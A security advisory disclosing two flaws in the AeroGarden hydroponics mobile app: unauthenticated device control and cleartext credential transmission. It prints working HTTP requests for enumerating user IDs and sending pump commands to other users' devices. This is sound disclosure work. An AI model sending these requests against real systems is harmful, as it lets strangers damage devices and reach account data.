AeroGarden Version 1.3.1 - Multiple Vulnerabilities

ADVISORY SUMMARY

AeroGrow International is a company that produces consumer hydroponic growing
hardware for plants (e.g., herbs, vegetables, and flowers). The hardware product can be
controlled with a mobile application for specific models of their hydroponic growing kits.
The project’s official website is http://www.aerogarden.com. The latest version of the
mobile application is 1.3.1.

Impact

Both identified vulnerabilities would be detrimental to AeroGarden users; an attacker could cause the devices to inflict damage to plant life or an attacker could capture traffic to access users’ account information.

Risk Level

Medium and High

Affected Vendor

Vulnerabilities List:

• INCORRECT ACCESS CONTROLS
• INSECURE NETWORK TRANSMISSION

Solution

Incorrect Access Controls: Implement proper access controls for user actions throughout the application.

Insecure Network Transmission: Enforce the use of secure channels for data transmission.

Credits

Jason Gay, Security Associate, Bishop Fox - [email protected]

Timeline

1. 02/20/2019: Initial discovery
2. 03/21/2019: First attempt to contact vendor
3. 04/17/2019: First contact with vendor
4. 07/30/2019: Public Disclosure

VULNERABILITIES

Incorrect Access Controls

This version of the AeroGarden application is affected by incorrect access controls. Any user can request information about other users’ Wi-Fi-enabled AeroGarden hardware products, and then use this information to change settings (such as water pump run time, light settings, and vacation mode settings). The vulnerability can be exploited by any remote user without authentication.

Further Details

• CVSS Base Score: 5.3
• CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

By observing the communication between the mobile application and the Amazon EC2 back end, the testing team revealed that the requests to execute commands on the AeroGarden hardware only required the MAC address (airGuid) of the hardware and the numerical user ID (userID) associated with that hardware. The testing team obtained this information by issuing the following request:

Request

POST /api/Custom/QueryUserDevice HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 12
Accept-Encoding: gzip, deflate

userID=[REDACTED]

The response returned the following information:

Response

{"configID":[REDACTED],"airGuid":[REDACTED],"lightCycle":"08000100","pumpCycle":"00050037","lightTemp":1,"lightStat":1,"clock":"160503","pumpStat":0,"pumpHydro":0,"pumpTest":1,"pumpDrain":null,"pumpDrainState":null,"pumpLevel":0,"pumpRemind4Hour":0,"gardenType":2,"plantedType":0,"plantedName":"S2l0Y2hlbg==","totalDay":120,"plantedDay":47,"nutriCycle":14,"nutriRemindDay":12,"nutriStatus":0,"alarmAllow":0,"plantedDate":"d2:40:d0:55:94:89","nutrientDate":[REDACTED]","updateDate":"2019-02-22T02:28:31","createDate":null,"swVersion":"MFW-V0.20","hwVersion":"SW-V1.18","bwVersion":"HW-V3.0","oldPlantedDay":47,"deviceID":"[REDACTED]","deviceIP":"[REDACTED]","chooseGarden":0,"oldlightCycle":null,"vacationMode":0,"bwConnectedSsid":null,"nutriStatusFlag":"0","nutriStatusDate":"0001-01-01T00:00:00","remark":null,"imgUrl":null,"timezone":"0","audioAlarmStat":0,"audioAlarmCycleSet":0,"audioAlarmCycle":null}]

By iterating through the possible 5-digit combos for the userID during testing, the team could retrieve the MAC address (airGuid) of various units not under their control. Only these two pieces of information were necessary to issue commands to the hardware.

With this information, an attacker could issue the following command to turn on the water pump for one minute:

POST /api/Custom/UpdateDeviceConfig HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 118
Accept-Encoding: gzip, deflate

airGuid=[REDACTED]&chooseGarden=0&plantConfig=%7B%0A%20%20%22pumpTest%22%20%3A%201%0A%7D&userID=[REDACTED]

It was confirmed that the unit then ran its pump for one minute. By reviewing different options within the mobile application, different commands could also be issued to alter the light cycle, set vacation mode, or return the devices to their default settings. An attacker could make the motor run until damaged or change options and timing to damage plant life in the system.

No authentication was required for exploitation.

Insecure Network Transmission

The AeroGarden application transmits not only request for command execution in cleartext but also login credentials for the user's account.

Further Details

• CVSS Base Score: 9.1
• CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

As shown with the Incorrect Access Control issue in this application, network communication between the mobile application and the Amazon EC2 instance occurs over insecure HTTP channels. During testing, insecure transmission of login information from the application was observed, as shown below:

POST /api/Admin/Login HTTP/1.1
Host: ec2-54-86-39-88.compute-1.amazonaws.com:8080
Content-Type: application/x-www-form-urlencoded
Connection: close
Accept: */*
User-Agent: BountyWiFi/1.3.1 (iPhone; iOS 12.1.4; Scale/3.00)
Accept-Language: en-US;q=1
Content-Length: 61
Accept-Encoding: gzip, deflate

mail=[REDACTED]&userPwd=[REDACTED]

If an attacker were able to capture this traffic, they could access a user’s account on the AeroGarden website, where they could access personal information (such as address and payment information), depending on whether the user has saved this information to the site or not.